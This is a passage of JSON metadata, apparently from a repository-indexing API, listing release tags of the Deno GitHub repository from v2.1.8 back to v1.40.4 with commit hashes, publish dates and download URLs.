/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a9